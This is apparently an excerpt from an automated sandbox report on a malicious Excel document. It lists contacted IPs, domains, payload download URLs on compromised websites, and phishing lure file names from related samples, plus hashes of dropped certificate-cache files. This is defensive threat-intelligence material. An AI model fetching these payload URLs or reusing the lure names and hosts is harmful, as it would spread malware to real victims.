http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.80.6	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false
138.36.237.100	unknown	Argentina	27823	DattateccomAR	false
68.66.216.42	unknown	United States	55293	A2HOSTINGUS	false
72.52.227.180	unknown	United States	32244	LIQUIDWEBUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	357282
Start date:	24.02.2021
Start time:	11:53:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 17s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SecuriteInfo.com.XF.AShadow.4960.21593.8307 (renamed file extension from 8307 to xls)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLS@11/13@6/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 91.199.212.52, 205.185.216.42, 205.185.216.10 Excluded domains from analysis (whitelisted): crt.usertrust.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.241.80.6	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dat
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
138.36.237.100	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.dat
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	jugueteriaelgato.com.ar/zsrrq/416212.jpg
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	jugueteriaelgato.com.ar/zsrrq/416212.jpg
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	loonytoys.com.ar/rqksqzjvcmv/416212.jpg
68.66.216.42	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	biblicalisraeltours.com/otmchxmxeg/44250659496064800000.dat
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	biblicalisraeltours.com/otmchxmxeg/44245960229745400000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	biblicalisraeltours.com/otmchxmxeg/44245955293750000000.dat
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	biblicalisraeltours.com/ivqcapzu/987298.jpg
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	biblicalisraeltours.com/ivqcapzu/987298.jpg
72.52.227.180	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44250666589120400000.dat
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44250659496064800000.dat
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44250601302777800000.dat
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44250596245254600000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44245960229745400000.dat
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	rzminc.com/fdzgprclatqo/44245955293750000000.dat

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
biblicalisraeltours.com	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	68.66.216.42
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	68.66.216.42
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	68.66.216.42
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	68.66.216.42
crt.sectigo.com	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	91.199.212.52
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	91.199.212.52
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	91.199.212.52
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	91.199.212.52
	CorpReport.exe	Get hash	malicious	Browse	91.199.212.52
	sys.dll	Get hash	malicious	Browse	91.199.212.52
	CorpReport.exe	Get hash	malicious	Browse	91.199.212.52
	CorpReport.exe	Get hash	malicious	Browse	91.199.212.52
	ReportCorp.exe	Get hash	malicious	Browse	91.199.212.52
	1S0a576pAR.exe	Get hash	malicious	Browse	91.199.212.52
	NJx63jHebE.exe	Get hash	malicious	Browse	91.199.212.52
	EmployeeComplaintReport.exe	Get hash	malicious	Browse	91.199.212.52
	ct.dll	Get hash	malicious	Browse	91.199.212.52
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	91.199.212.52
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	91.199.212.52
	documents.doc	Get hash	malicious	Browse	91.199.212.52
	ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc	Get hash	malicious	Browse	91.199.212.52
	N.11389944 BS 05 gen 2021.doc	Get hash	malicious	Browse	91.199.212.52
	PSX7103491.doc	Get hash	malicious	Browse	91.199.212.52
	Beauftragung.doc	Get hash	malicious	Browse	91.199.212.52
rzminc.com	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	72.52.227.180
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	72.52.227.180
jugueterialatorre.com.ar	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
pathinanchilearthmovers.com	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	162.241.80.6
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	162.241.80.6

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DattateccomAR	zJsbHB4YyL.doc	Get hash	malicious	Browse	200.58.110.56
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	138.36.237.100
	swift copy pdf.exe	Get hash	malicious	Browse	200.58.111.74
	Purchase Order _pdf.exe	Get hash	malicious	Browse	200.58.111.74
	Purchase Order _pdf.exe	Get hash	malicious	Browse	200.58.111.74
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	CompensationClaim-1245593270-02032021.xls	Get hash	malicious	Browse	138.36.237.100
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	138.36.237.100
	fp5H5ulYUE5566sbSLC2.xls	Get hash	malicious	Browse	138.36.237.100
	Payment Advice.xlsx	Get hash	malicious	Browse	66.97.33.176
	Meezan Bank Payment.xlsx	Get hash	malicious	Browse	179.43.117.150
	Walmart Order.xlsx	Get hash	malicious	Browse	179.43.117.150
	INQUIRY-NOV-ORDER.xls	Get hash	malicious	Browse	179.43.114.162
UNIFIEDLAYER-AS-1US	Quotations.xlsx	Get hash	malicious	Browse	50.87.253.95
	orden de compra xls.exe	Get hash	malicious	Browse	192.185.100.181
	3zutY8IPBS.exe	Get hash	malicious	Browse	192.185.113.223
	Attachment_78216.xlsb	Get hash	malicious	Browse	192.254.183.124
	00113221.xlsx	Get hash	malicious	Browse	74.220.199.6
	Outstanding Payment.exe	Get hash	malicious	Browse	108.179.232.42
	vB1Zux02Zf.exe	Get hash	malicious	Browse	162.241.217.138
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	198.20.228.9
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	162.241.80.6
	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Get hash	malicious	Browse	50.116.112.43
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	50.87.196.120
	PO-A2174679-06.exe	Get hash	malicious	Browse	192.185.78.145
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	108.167.156.42
	CV-JOB REQUEST______PDF.EXE	Get hash	malicious	Browse	192.185.181.49
	PO.exe	Get hash	malicious	Browse	192.185.0.218
	Complaint-1091191320-02182021.xls	Get hash	malicious	Browse	192.185.16.95
	ESCANEAR_FACTURA-20794564552_docx.exe	Get hash	malicious	Browse	162.214.158.75
A2HOSTINGUS	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	68.66.216.42
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	68.66.216.42
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	68.66.216.42
	Statement_of_Account_as_of 02_17_2021.xlsm	Get hash	malicious	Browse	68.66.248.35
	Statement_of_Account_as_of 02_17_2021.xlsm	Get hash	malicious	Browse	68.66.248.35
	Claim-121548989-02162021.xls	Get hash	malicious	Browse	68.66.226.85
	ProtectedAdviceSlip.xls	Get hash	malicious	Browse	70.32.23.16
	v1K1JNtCgt.exe	Get hash	malicious	Browse	209.124.66.12
	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	185.148.129.158
	ac6e58332e379d0712d36c5c83985c42.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	185.148.129.158
	v22Pc0qA.doc.doc	Get hash	malicious	Browse	70.32.23.44
	2wUaqWdy.doc.doc	Get hash	malicious	Browse	70.32.23.44
	A3kAp3uzpg.xlsm	Get hash	malicious	Browse	85.187.128.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	document-350252698.xls	Get hash	malicious	Browse	138.36.237.100
	Document14371.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint_Letter_1186814227-02192021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	138.36.237.100
	mexhlc.xlsx	Get hash	malicious	Browse	138.36.237.100
	document-550193913.xls	Get hash	malicious	Browse	138.36.237.100
	document-1915351743.xls	Get hash	malicious	Browse	138.36.237.100
	SecuriteInfo.com.Heur.15528.xls	Get hash	malicious	Browse	138.36.237.100
	Subconract 504.xlsm	Get hash	malicious	Browse	138.36.237.100
	upbck.xlsx	Get hash	malicious	Browse	138.36.237.100
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	138.36.237.100
	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	138.36.237.100
	_a6590.docx	Get hash	malicious	Browse	138.36.237.100
	Small Charities.xlsx	Get hash	malicious	Browse	138.36.237.100
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	138.36.237.100
	notice of arrival.xlsx	Get hash	malicious	Browse	138.36.237.100
	22-2-2021 .xlsx	Get hash	malicious	Browse	138.36.237.100
	Shipping_Document.xlsx	Get hash	malicious	Browse	138.36.237.100
	Remittance copy.xlsx	Get hash	malicious	Browse	138.36.237.100

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1559
Entropy (8bit):	7.399832861783252
Encrypted:	false
SSDEEP:	48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
MD5:	ADAB5C4DF031FB9299F71ADA7E18F613
SHA1:	33E4E80807204C2B6182A3A14B591ACD25B5F0DB
SHA-256:	7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
SHA-512:	983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..........}[Q&.v...t...S..0....H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0....H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1413
Entropy (8bit):	7.480496427934893
Encrypted:	false
SSDEEP:	24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
MD5:	285EC909C4AB0D2D57F5086B225799AA
SHA1:	D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
SHA-256:	68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
SHA-512:	4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..i.......9rD:.".Q..l..15.0....H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Comodo CA Limited1!0...U....AAA Certificate Services0...190312000000Z..281231235959Z0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0.."0....H.............0..........e.6......W.v..'.L.P.a. M.-d.....=.........{7(.+G.9.:.._..}..cB.v.;+...o... ..>..t.....bd......j."<......{......Q..gF.Q..T?.3.~l......Q.5..f.rg.!f..x..P:.....L....5.WZ....=.,..T....:M.L..\... =.."4.~;hf.D..NFS.3`...S7.sC.2.S...tNi.k.`.......2..;Qx.g..=V...i....%&k3m.nG.sC.~..f.)\|2.cU.....T0....}7..]:l5\.A...I......b..f.%....?.9......L.\|.k..^...g.....[..L..[...s.#;-..5Ut.I.IX...6.Q...&}.M....C&.A_@.DD...W..P.WT.>.tc/.Pe..XB.C.L..%GY.....&FJP...x..g...W...c..b.._U..\.(..%9..+..L...?.R.../..........0..0...U.#..0......#>.....)...0..0...U......Sy.Z.+J.T.......f.0...U...........0...U.......0....0...U

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.129725157113391
Encrypted:	false
SSDEEP:	3:kkFklHhOR9llXfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ1N:kKxR9llqjXxp9jKFlIaYM2+/LOjA/
MD5:	5959AC649656458494BAB1F86BEB3DB1
SHA1:	30A80439CDB3DDFAB9BFB433E0E47B957E046B3C
SHA-256:	C8F0EA3ED5E82F77EB870EAAA5E4E02FBD49B59F1A32DB38A0D4B39E01F3AF0D
SHA-512:	23B660C8CA426D37A555E9793751FB2910A3080DB0C86C6FD4DAB8DB7FB624EC9B1685169CC857AED974ABA70FFD70CF14BF03EA90DDFBA64E0CDD22A6B5BAB5
Malicious:	false
Reputation:	low
Preview:	p...... ........2D......(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.0786571245093444
Encrypted:	false
SSDEEP:	6:kKepbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Ww3kPlE99SNxAhUeo+aKt
MD5:	C471F3E3546ABE9A156D79E7B2031F81
SHA1:	BB0FB1A17A9DA6F54AD54925A62BB6BE5CA5CBE2
SHA-256:	99F56F67D6CDCD1E3323B4B9B839F4E217D9D97393D14DACC1D802B6732ECCA5
SHA-512:	E1985C606579C3ADCE8A9EC0CCFD315C280FF7DA3B7CD00E4A430DFAD30E9218B32F96B75E6A70DFA2ACCB4E677A54CEFD21CBDA8E4EACA110A35165FB7A109A
Malicious:	false
Preview:	p...... ..........'.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	250
Entropy (8bit):	2.969287375524799
Encrypted:	false
SSDEEP:	3:kkFklNlAlDqMlXfllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9o:kKFleMlqQAbjMulgokaWbLOW+n
MD5:	8422257CB589C7117C98EB66825EABE5
SHA1:	E8589CAADAC4C2755A76C24D1C16F55E38AA7DFE
SHA-256:	62EF633B1F4306B5370DA5DA8FFFA13ED0AE505BCEB35DB1124694017CF05646
SHA-512:	1E218CA0DCEAC7A141E208C18646CE7EAC7855B30F64B0FBC579DF9990F917E1FCCBAA000A64F8168B66E46DCD8CC15206247191244D80EBE41717E9A187ABCC
Malicious:	false
Preview:	p...... ....h...x.......(....................................................... .........(.f...@8..................h.t.t.p.:././.c.r.t...u.s.e.r.t.r.u.s.t...c.o.m./.U.S.E.R.T.r.u.s.t.R.S.A.A.d.d.T.r.u.s.t.C.A...c.r.t...".5.c.8.6.f.6.8.0.-.5.8.5."...

C:\Users\user\AppData\Local\Temp\9ACE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	31753
Entropy (8bit):	7.647975541014588
Encrypted:	false
SSDEEP:	768:TkBP+MDFc5uhNUuOW+u7qS7oauYEmUI/V7nz:TQWMHNffMaFTBz
MD5:	C450D67B76EB836299B13DE6DA5E1F16
SHA1:	5617B9FC421C180FD7FCEC8054738DB0811B7FF2
SHA-256:	0498E5ED54BDC48996FB1D86DF4B1A605D2AFF9DE3C280C652E00149F278B041
SHA-512:	82550411A326F52E5184BA66AA4EB46FE18AE0259D7BCA02A106F0A3162F76AD901326AF8C1A49ED3756C9CC34AB811653F33BCFEDD97F3E6ABB8BCA76078570
Malicious:	false
Preview:	.U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....\|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CabE18A.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
